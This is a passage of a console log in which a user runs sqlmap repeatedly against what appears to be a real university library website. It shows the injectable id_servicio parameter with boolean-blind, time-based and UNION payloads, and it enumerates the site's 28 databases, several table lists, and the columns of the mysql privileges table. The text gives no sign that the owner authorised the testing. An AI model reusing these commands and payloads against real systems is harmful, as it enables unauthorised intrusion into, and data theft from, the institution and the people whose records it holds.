  549. [17:22:47] [INFO] testing connection to the target URL
  550. sqlmap resumed the following injection point(s) from stored session:
  551. ---
  552. Parameter: id_servicio (GET)
  553.     Type: boolean-based blind
  554.     Title: AND boolean-based blind - WHERE or HAVING clause
  555.     Payload: id_servicio=19 AND 1397=1397
  556.  
  557.     Type: AND/OR time-based blind
  558.     Title: MySQL >= 5.0.12 AND time-based blind
  559.     Payload: id_servicio=19 AND SLEEP(5)
  560.  
  561.     Type: UNION query
  562.     Title: Generic UNION query (NULL) - 11 columns
  563.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  564. ---
  565. [17:22:49] [INFO] testing MySQL
  566. [17:22:49] [INFO] confirming MySQL
  567. [17:22:49] [INFO] the back-end DBMS is MySQL
  568. web server operating system: Windows
  569. web application technology: PHP 5.2.3, Apache 2.2.4
  570. back-end DBMS: MySQL >= 5.0.0
  571. [17:22:49] [INFO] fetching tables for database: 'biblioteca_digital'
  572. [17:22:52] [INFO] the SQL query used returns 37 entries
  573. [17:22:54] [INFO] retrieved: articulos
  574. [17:22:56] [INFO] retrieved: articulos_autores
  575. [17:22:58] [INFO] retrieved: articulos_keywords
  576. [17:23:00] [INFO] retrieved: articulos_temas
  577. [17:23:02] [INFO] retrieved: autores
  578. [17:23:06] [INFO] retrieved: capitulos
  579. [17:23:07] [INFO] retrieved: capitulos_autores
  580. [17:23:09] [INFO] retrieved: coeditores
  581. [17:23:11] [INFO] retrieved: departamentos
  582. [17:23:12] [INFO] retrieved: dias
  583. [17:23:14] [INFO] retrieved: estadisticas
  584. [17:23:16] [INFO] retrieved: fasciculos
  585. [17:23:18] [INFO] retrieved: hosts
  586. [17:23:20] [INFO] retrieved: ipcountries
  587. [17:23:21] [INFO] retrieved: ipcountries_copy
  588. [17:23:23] [INFO] retrieved: keywords
  589. [17:23:25] [INFO] retrieved: libros
  590. [17:23:27] [INFO] retrieved: libros_autores
  591. [17:23:28] [INFO] retrieved: libros_coeditores
  592. [17:23:30] [INFO] retrieved: libros_copy1
  593. [17:23:32] [INFO] retrieved: libros_error00
  594. [17:23:34] [INFO] retrieved: libros_keywords
  595. [17:23:35] [INFO] retrieved: libros_original
  596. [17:23:37] [INFO] retrieved: libros_series
  597. [17:23:39] [INFO] retrieved: libros_subseries
  598. [17:23:40] [INFO] retrieved: libros_temas
  599. [17:23:42] [INFO] retrieved: lista_de_usuarios_bidi
  600. [17:23:44] [INFO] retrieved: lista_de_usuarios_revistas
  601. [17:23:45] [INFO] retrieved: revistas
  602. [17:23:47] [INFO] retrieved: revistas_copy
  603. [17:23:48] [INFO] retrieved: series
  604. [17:23:50] [INFO] retrieved: subseries
  605. [17:23:52] [INFO] retrieved: temas
  606. [17:23:53] [INFO] retrieved: temporal_libros
  607. [17:23:55] [INFO] retrieved: usuarios
  608. [17:23:57] [INFO] retrieved: usuarios_mig
  609. [17:23:58] [INFO] retrieved: visitas
  610. Database: biblioteca_digital
  611. [37 tables]
  612. +----------------------------+
  613. | articulos                  |
  614. | articulos_autores          |
  615. | articulos_keywords         |
  616. | articulos_temas            |
  617. | autores                    |
  618. | capitulos                  |
  619. | capitulos_autores          |
  620. | coeditores                 |
  621. | departamentos              |
  622. | dias                       |
  623. | estadisticas               |
  624. | fasciculos                 |
  625. | hosts                      |
  626. | ipcountries                |
  627. | ipcountries_copy           |
  628. | keywords                   |
  629. | libros                     |
  630. | libros_autores             |
  631. | libros_coeditores          |
  632. | libros_copy1               |
  633. | libros_error00             |
  634. | libros_keywords            |
  635. | libros_original            |
  636. | libros_series              |
  637. | libros_subseries           |
  638. | libros_temas               |
  639. | lista_de_usuarios_bidi     |
  640. | lista_de_usuarios_revistas |
  641. | revistas                   |
  642. | revistas_copy              |
  643. | series                     |
  644. | subseries                  |
  645. | temas                      |
  646. | temporal_libros            |
  647. | usuarios                   |
  648. | usuarios_mig               |
  649. | visitas                    |
  650. +----------------------------+
  651.  
  652. [17:23:59] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  653.  
  654. [*] shutting down at 17:23:59
  655.  
  656.  
  657. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  658.          _
  659.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  660. |_ -| . | |     | .'| . |
  661. |___|_  |_|_|_|_|__,|  _|
  662.       |_|           |_|   http://sqlmap.org
  663.  
  664. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  665.  
  666. [*] starting at 17:24:30
  667.  
  668. [17:24:31] [INFO] testing connection to the target URL
  669. sqlmap resumed the following injection point(s) from stored session:
  670. ---
  671. Parameter: id_servicio (GET)
  672.     Type: boolean-based blind
  673.     Title: AND boolean-based blind - WHERE or HAVING clause
  674.     Payload: id_servicio=19 AND 1397=1397
  675.  
  676.     Type: AND/OR time-based blind
  677.     Title: MySQL >= 5.0.12 AND time-based blind
  678.     Payload: id_servicio=19 AND SLEEP(5)
  679.  
  680.     Type: UNION query
  681.     Title: Generic UNION query (NULL) - 11 columns
  682.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  683. ---
  684. [17:24:33] [INFO] testing MySQL
  685. [17:24:33] [INFO] confirming MySQL
  686. [17:24:33] [INFO] the back-end DBMS is MySQL
  687. web server operating system: Windows
  688. web application technology: PHP 5.2.3, Apache 2.2.4
  689. back-end DBMS: MySQL >= 5.0.0
  690. [17:24:33] [INFO] fetching database names
  691. [17:24:33] [INFO] the SQL query used returns 28 entries
  692. available databases [28]:
  693. [*] adq
  694. [*] aleph
  695. [*] areas_biblioteca
  696. [*] biblioteca_digital
  697. [*] cosei
  698. [*] cuentasxxi
  699. [*] descarteah
  700. [*] empleados
  701. [*] inegi
  702. [*] information_schema
  703. [*] jornadas
  704. [*] libreria
  705. [*] libreria_antes_actualizacion
  706. [*] multimedia_registro
  707. [*] mysql
  708. [*] oai-uamx
  709. [*] phpmyadmin
  710. [*] pib
  711. [*] planes_bibliografia
  712. [*] proctec
  713. [*] recursos_electronicos
  714. [*] resguardos
  715. [*] revistas_electronicas
  716. [*] salas
  717. [*] sscbs
  718. [*] tesis
  719. [*] tesis_pruebas
  720. [*] test
  721.  
  722. [17:24:34] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  723.  
  724. [*] shutting down at 17:24:34
  725.  
  726.  
  727. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D empleados --tables
  728.          _
  729.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  730. |_ -| . | |     | .'| . |
  731. |___|_  |_|_|_|_|__,|  _|
  732.       |_|           |_|   http://sqlmap.org
  733.  
  734. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  735.  
  736. [*] starting at 17:25:17
  737.  
  738. [17:25:17] [INFO] testing connection to the target URL
  739. sqlmap resumed the following injection point(s) from stored session:
  740. ---
  741. Parameter: id_servicio (GET)
  742.     Type: boolean-based blind
  743.     Title: AND boolean-based blind - WHERE or HAVING clause
  744.     Payload: id_servicio=19 AND 1397=1397
  745.  
  746.     Type: AND/OR time-based blind
  747.     Title: MySQL >= 5.0.12 AND time-based blind
  748.     Payload: id_servicio=19 AND SLEEP(5)
  749.  
  750.     Type: UNION query
  751.     Title: Generic UNION query (NULL) - 11 columns
  752.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  753. ---
  754. [17:25:19] [INFO] testing MySQL
  755. [17:25:19] [INFO] confirming MySQL
  756. [17:25:20] [INFO] the back-end DBMS is MySQL
  757. web server operating system: Windows
  758. web application technology: PHP 5.2.3, Apache 2.2.4
  759. back-end DBMS: MySQL >= 5.0.0
  760. [17:25:20] [INFO] fetching tables for database: 'empleados'
  761. [17:25:21] [INFO] fetching number of tables for database 'empleados'
  762. [17:25:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  763. [17:25:21] [INFO] retrieved: 0
  764. [17:25:35] [WARNING] database 'empleados' appears to be empty
  765. [17:25:35] [ERROR] unable to retrieve the table names for any database
  766. do you want to use common table existence check? [y/N/q] y
  767. [17:25:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  768. [17:25:42] [INFO] checking table existence using items from 'C:\Users\whitejoker52\Desktop\hacking\sqlmap\txt\common-tables.txt'
  769. [17:25:42] [INFO] adding words used on web page to the check list
  770. please enter number of threads? [Enter for 1 (current)] 10
  771. [17:25:44] [INFO] starting 10 threads
  772. [17:27:09] [INFO] tried 367/3466 items (11%)
  773. [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  774. [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  775. [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  776. [17:27:12] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
  777. [17:28:41] [INFO] tried 718/3466 items (21%)
  778. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  779. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  780. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  781. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  782. [17:32:13] [INFO] tried 1532/3466 items (44%)
  783. [17:32:13] [WARNING] turning off pre-connect mechanism because of connection time out(s)
  784. [17:32:13] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
  785. [17:32:14] [INFO] tried 1534/3466 items (44%)
  786. [17:32:14] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
  787. [17:33:17] [INFO] tried 1815/3466 items (52%)
  788. [17:33:19] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  789. [17:33:19] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  790. [17:34:52] [INFO] tried 2235/3466 items (64%)
  791. [17:34:55] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  792. [17:34:55] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  793. [17:36:22] [INFO] tried 2596/3466 items (75%)
  794. [17:36:27] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  795. [17:36:27] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  796. [17:37:49] [INFO] tried 2971/3466 items (86%)
  797. [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  798. [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  799. [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  800. [17:39:25] [INFO] tried 3343/3466 items (96%)
  801. [17:39:30] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  802. [17:39:30] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  803.  
  804. [17:40:05] [WARNING] no table(s) found
  805. No tables found
  806. [17:40:05] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  807.  
  808. [*] shutting down at 17:40:05
  809.  
  810.  
  811. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  812.          _
  813.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  814. |_ -| . | |     | .'| . |
  815. |___|_  |_|_|_|_|__,|  _|
  816.       |_|           |_|   http://sqlmap.org
  817.  
  818. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  819.  
  820. [*] starting at 17:40:13
  821.  
  822. [17:40:13] [INFO] testing connection to the target URL
  823. sqlmap resumed the following injection point(s) from stored session:
  824. ---
  825. Parameter: id_servicio (GET)
  826.     Type: boolean-based blind
  827.     Title: AND boolean-based blind - WHERE or HAVING clause
  828.     Payload: id_servicio=19 AND 1397=1397
  829.  
  830.     Type: AND/OR time-based blind
  831.     Title: MySQL >= 5.0.12 AND time-based blind
  832.     Payload: id_servicio=19 AND SLEEP(5)
  833.  
  834.     Type: UNION query
  835.     Title: Generic UNION query (NULL) - 11 columns
  836.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  837. ---
  838. [17:40:16] [INFO] testing MySQL
  839. [17:40:16] [INFO] confirming MySQL
  840. [17:40:16] [INFO] the back-end DBMS is MySQL
  841. web server operating system: Windows
  842. web application technology: PHP 5.2.3, Apache 2.2.4
  843. back-end DBMS: MySQL >= 5.0.0
  844. [17:40:16] [INFO] fetching database names
  845. [17:40:16] [INFO] the SQL query used returns 28 entries
  846. available databases [28]:
  847. [*] adq
  848. [*] aleph
  849. [*] areas_biblioteca
  850. [*] biblioteca_digital
  851. [*] cosei
  852. [*] cuentasxxi
  853. [*] descarteah
  854. [*] empleados
  855. [*] inegi
  856. [*] information_schema
  857. [*] jornadas
  858. [*] libreria
  859. [*] libreria_antes_actualizacion
  860. [*] multimedia_registro
  861. [*] mysql
  862. [*] oai-uamx
  863. [*] phpmyadmin
  864. [*] pib
  865. [*] planes_bibliografia
  866. [*] proctec
  867. [*] recursos_electronicos
  868. [*] resguardos
  869. [*] revistas_electronicas
  870. [*] salas
  871. [*] sscbs
  872. [*] tesis
  873. [*] tesis_pruebas
  874. [*] test
  875.  
  876. [17:40:16] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  877.  
  878. [*] shutting down at 17:40:16
  879.  
  880.  
  881. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D mysql --tables
  882.          _
  883.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  884. |_ -| . | |     | .'| . |
  885. |___|_  |_|_|_|_|__,|  _|
  886.       |_|           |_|   http://sqlmap.org
  887.  
  888. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  889.  
  890. [*] starting at 17:40:46
  891.  
  892. [17:40:46] [INFO] testing connection to the target URL
  893. sqlmap resumed the following injection point(s) from stored session:
  894. ---
  895. Parameter: id_servicio (GET)
  896.     Type: boolean-based blind
  897.     Title: AND boolean-based blind - WHERE or HAVING clause
  898.     Payload: id_servicio=19 AND 1397=1397
  899.  
  900.     Type: AND/OR time-based blind
  901.     Title: MySQL >= 5.0.12 AND time-based blind
  902.     Payload: id_servicio=19 AND SLEEP(5)
  903.  
  904.     Type: UNION query
  905.     Title: Generic UNION query (NULL) - 11 columns
  906.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  907. ---
  908. [17:40:49] [INFO] testing MySQL
  909. [17:40:49] [INFO] confirming MySQL
  910. [17:40:49] [INFO] the back-end DBMS is MySQL
  911. web server operating system: Windows
  912. web application technology: PHP 5.2.3, Apache 2.2.4
  913. back-end DBMS: MySQL >= 5.0.0
  914. [17:40:49] [INFO] fetching tables for database: 'mysql'
  915. [17:40:51] [INFO] the SQL query used returns 17 entries
  916. [17:40:53] [INFO] retrieved: columns_priv
  917. [17:40:55] [INFO] retrieved: db
  918. [17:40:56] [INFO] retrieved: func
  919. [17:40:59] [INFO] retrieved: help_category
  920. [17:41:01] [INFO] retrieved: help_keyword
  921. [17:41:03] [INFO] retrieved: help_relation
  922. [17:41:05] [INFO] retrieved: help_topic
  923. [17:41:08] [INFO] retrieved: host
  924. [17:41:10] [INFO] retrieved: proc
  925. [17:41:11] [INFO] retrieved: procs_priv
  926. [17:41:14] [INFO] retrieved: tables_priv
  927. [17:41:15] [INFO] retrieved: time_zone
  928. [17:41:17] [INFO] retrieved: time_zone_leap_second
  929. [17:41:20] [INFO] retrieved: time_zone_name
  930. [17:41:22] [INFO] retrieved: time_zone_transition
  931. [17:41:25] [INFO] retrieved: time_zone_transition_type
  932. [17:41:27] [INFO] retrieved: user
  933. Database: mysql
  934. [17 tables]
  935. +---------------------------+
  936. | user                      |
  937. | columns_priv              |
  938. | db                        |
  939. | func                      |
  940. | help_category             |
  941. | help_keyword              |
  942. | help_relation             |
  943. | help_topic                |
  944. | host                      |
  945. | proc                      |
  946. | procs_priv                |
  947. | tables_priv               |
  948. | time_zone                 |
  949. | time_zone_leap_second     |
  950. | time_zone_name            |
  951. | time_zone_transition      |
  952. | time_zone_transition_type |
  953. +---------------------------+
  954.  
  955. [17:41:27] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  956.  
  957. [*] shutting down at 17:41:27
  958.  
  959.  
  960. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D mysql -T db  --columns
  961.          _
  962.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  963. |_ -| . | |     | .'| . |
  964. |___|_  |_|_|_|_|__,|  _|
  965.       |_|           |_|   http://sqlmap.org
  966.  
  967. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  968.  
  969. [*] starting at 17:41:44
  970.  
  971. [17:41:44] [INFO] testing connection to the target URL
  972. sqlmap resumed the following injection point(s) from stored session:
  973. ---
  974. Parameter: id_servicio (GET)
  975.     Type: boolean-based blind
  976.     Title: AND boolean-based blind - WHERE or HAVING clause
  977.     Payload: id_servicio=19 AND 1397=1397
  978.  
  979.     Type: AND/OR time-based blind
  980.     Title: MySQL >= 5.0.12 AND time-based blind
  981.     Payload: id_servicio=19 AND SLEEP(5)
  982.  
  983.     Type: UNION query
  984.     Title: Generic UNION query (NULL) - 11 columns
  985.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  986. ---
  987. [17:41:47] [INFO] testing MySQL
  988. [17:41:47] [INFO] confirming MySQL
  989. [17:41:47] [INFO] the back-end DBMS is MySQL
  990. web server operating system: Windows
  991. web application technology: PHP 5.2.3, Apache 2.2.4
  992. back-end DBMS: MySQL >= 5.0.0
  993. [17:41:47] [INFO] fetching columns for table 'db' in database 'mysql'
  994. [17:41:48] [INFO] the SQL query used returns 20 entries
  995. [17:41:50] [INFO] retrieved: "Host","char(60)"
  996. [17:41:52] [INFO] retrieved: "Db","char(64)"
  997. [17:41:54] [INFO] retrieved: "User","char(16)"
  998. [17:41:55] [INFO] retrieved: "Select_priv","enum('N','Y')"
  999. [17:41:57] [INFO] retrieved: "Insert_priv","enum('N','Y')"
  1000. [17:41:59] [INFO] retrieved: "Update_priv","enum('N','Y')"
  1001. [17:42:01] [INFO] retrieved: "Delete_priv","enum('N','Y')"
  1002. [17:42:04] [INFO] retrieved: "Create_priv","enum('N','Y')"
  1003. [17:42:06] [INFO] retrieved: "Drop_priv","enum('N','Y')"
  1004. [17:42:07] [INFO] retrieved: "Grant_priv","enum('N','Y')"
  1005. [17:42:09] [INFO] retrieved: "References_priv","enum('N','Y')"
  1006. [17:42:12] [INFO] retrieved: "Index_priv","enum('N','Y')"
  1007. [17:42:14] [INFO] retrieved: "Alter_priv","enum('N','Y')"
  1008. [17:42:15] [INFO] retrieved: "Create_tmp_table_priv","enum('N','Y')"
  1009. [17:42:17] [INFO] retrieved: "Lock_tables_priv","enum('N','Y')"
  1010. [17:42:19] [INFO] retrieved: "Create_view_priv","enum('N','Y')"
  1011. [17:42:21] [INFO] retrieved: "Show_view_priv","enum('N','Y')"
  1012. [17:42:23] [INFO] retrieved: "Create_routine_priv","enum('N','Y')"
  1013. [17:42:25] [INFO] retrieved: "Alter_routine_priv","enum('N','Y')"
  1014. [17:42:26] [INFO] retrieved: "Execute_priv","enum('N','Y')"
  1015. Database: mysql
  1016. Table: db
  1017. [20 columns]
  1018. +-----------------------+---------------+
  1019. | Column                | Type          |
  1020. +-----------------------+---------------+
  1021. | User                  | char(16)      |
  1022. | Alter_priv            | enum('N','Y') |
  1023. | Alter_routine_priv    | enum('N','Y') |
  1024. | Create_priv           | enum('N','Y') |
  1025. | Create_routine_priv   | enum('N','Y') |
  1026. | Create_tmp_table_priv | enum('N','Y') |
  1027. | Create_view_priv      | enum('N','Y') |
  1028. | Db                    | char(64)      |
  1029. | Delete_priv           | enum('N','Y') |
  1030. | Drop_priv             | enum('N','Y') |
  1031. | Execute_priv          | enum('N','Y') |
  1032. | Grant_priv            | enum('N','Y') |
  1033. | Host                  | char(60)      |
  1034. | Index_priv            | enum('N','Y') |
  1035. | Insert_priv           | enum('N','Y') |
  1036. | Lock_tables_priv      | enum('N','Y') |
  1037. | References_priv       | enum('N','Y') |
  1038. | Select_priv           | enum('N','Y') |
  1039. | Show_view_priv        | enum('N','Y') |
  1040. | Update_priv           | enum('N','Y') |
  1041. +-----------------------+---------------+
  1042.  
  1043. [17:42:26] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1044.  
  1045. [*] shutting down at 17:42:26
  1046.  
  1047.  
  1048. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  1049.          _
  1050.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1051. |_ -| . | |     | .'| . |
  1052. |___|_  |_|_|_|_|__,|  _|
  1053.       |_|           |_|   http://sqlmap.org
  1054.  
  1055. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1056.  
  1057. [*] starting at 17:42:38
  1058.  
  1059. [17:42:38] [INFO] testing connection to the target URL
  1060. sqlmap resumed the following injection point(s) from stored session:
  1061. ---
  1062. Parameter: id_servicio (GET)
  1063.     Type: boolean-based blind
  1064.     Title: AND boolean-based blind - WHERE or HAVING clause
  1065.     Payload: id_servicio=19 AND 1397=1397
  1066.  
  1067.     Type: AND/OR time-based blind
  1068.     Title: MySQL >= 5.0.12 AND time-based blind
  1069.     Payload: id_servicio=19 AND SLEEP(5)
  1070.  
  1071.     Type: UNION query
  1072.     Title: Generic UNION query (NULL) - 11 columns
  1073.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1074. ---
  1075. [17:42:41] [INFO] testing MySQL
  1076. [17:42:41] [INFO] confirming MySQL
  1077. [17:42:41] [INFO] the back-end DBMS is MySQL
  1078. web server operating system: Windows
  1079. web application technology: PHP 5.2.3, Apache 2.2.4
  1080. back-end DBMS: MySQL >= 5.0.0
  1081. [17:42:41] [INFO] fetching database names
  1082. [17:42:41] [INFO] the SQL query used returns 28 entries
  1083. available databases [28]:
  1084. [*] adq
  1085. [*] aleph
  1086. [*] areas_biblioteca
  1087. [*] biblioteca_digital
  1088. [*] cosei
  1089. [*] cuentasxxi
  1090. [*] descarteah
  1091. [*] empleados
  1092. [*] inegi
  1093. [*] information_schema
  1094. [*] jornadas
  1095. [*] libreria
  1096. [*] libreria_antes_actualizacion
  1097. [*] multimedia_registro
  1098. [*] mysql
  1099. [*] oai-uamx
  1100. [*] phpmyadmin
  1101. [*] pib
  1102. [*] planes_bibliografia
  1103. [*] proctec
  1104. [*] recursos_electronicos
  1105. [*] resguardos
  1106. [*] revistas_electronicas
  1107. [*] salas
  1108. [*] sscbs
  1109. [*] tesis
  1110. [*] tesis_pruebas
  1111. [*] test
  1112.  
  1113. [17:42:41] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1114.  
  1115. [*] shutting down at 17:42:41
  1116.  
  1117.  
  1118. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D phpmyadmin --tables
  1119.          _
  1120.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1121. |_ -| . | |     | .'| . |
  1122. |___|_  |_|_|_|_|__,|  _|
  1123.       |_|           |_|   http://sqlmap.org
  1124.  
  1125. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1126.  
  1127. [*] starting at 17:43:09
  1128.  
  1129. [17:43:10] [INFO] testing connection to the target URL
  1130. sqlmap resumed the following injection point(s) from stored session:
  1131. ---
  1132. Parameter: id_servicio (GET)
  1133.     Type: boolean-based blind
  1134.     Title: AND boolean-based blind - WHERE or HAVING clause
  1135.     Payload: id_servicio=19 AND 1397=1397
  1136.  
  1137.     Type: AND/OR time-based blind
  1138.     Title: MySQL >= 5.0.12 AND time-based blind
  1139.     Payload: id_servicio=19 AND SLEEP(5)
  1140.  
  1141.     Type: UNION query
  1142.     Title: Generic UNION query (NULL) - 11 columns
  1143.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1144. ---
  1145. [17:43:12] [INFO] testing MySQL
  1146. [17:43:12] [INFO] confirming MySQL
  1147. [17:43:12] [INFO] the back-end DBMS is MySQL
  1148. web server operating system: Windows
  1149. web application technology: PHP 5.2.3, Apache 2.2.4
  1150. back-end DBMS: MySQL >= 5.0.0
  1151. [17:43:12] [INFO] fetching tables for database: 'phpmyadmin'
  1152. [17:43:14] [INFO] the SQL query used returns 7 entries
  1153. [17:43:16] [INFO] retrieved: pma_bookmark
  1154. [17:43:18] [INFO] retrieved: pma_column_info
  1155. [17:43:20] [INFO] retrieved: pma_history
  1156. [17:43:21] [INFO] retrieved: pma_pdf_pages
  1157. [17:43:23] [INFO] retrieved: pma_relation
  1158. [17:43:25] [INFO] retrieved: pma_table_coords
  1159. [17:43:26] [INFO] retrieved: pma_table_info
  1160. Database: phpmyadmin
  1161. [7 tables]
  1162. +------------------+
  1163. | pma_bookmark     |
  1164. | pma_column_info  |
  1165. | pma_history      |
  1166. | pma_pdf_pages    |
  1167. | pma_relation     |
  1168. | pma_table_coords |
  1169. | pma_table_info   |
  1170. +------------------+
  1171.  
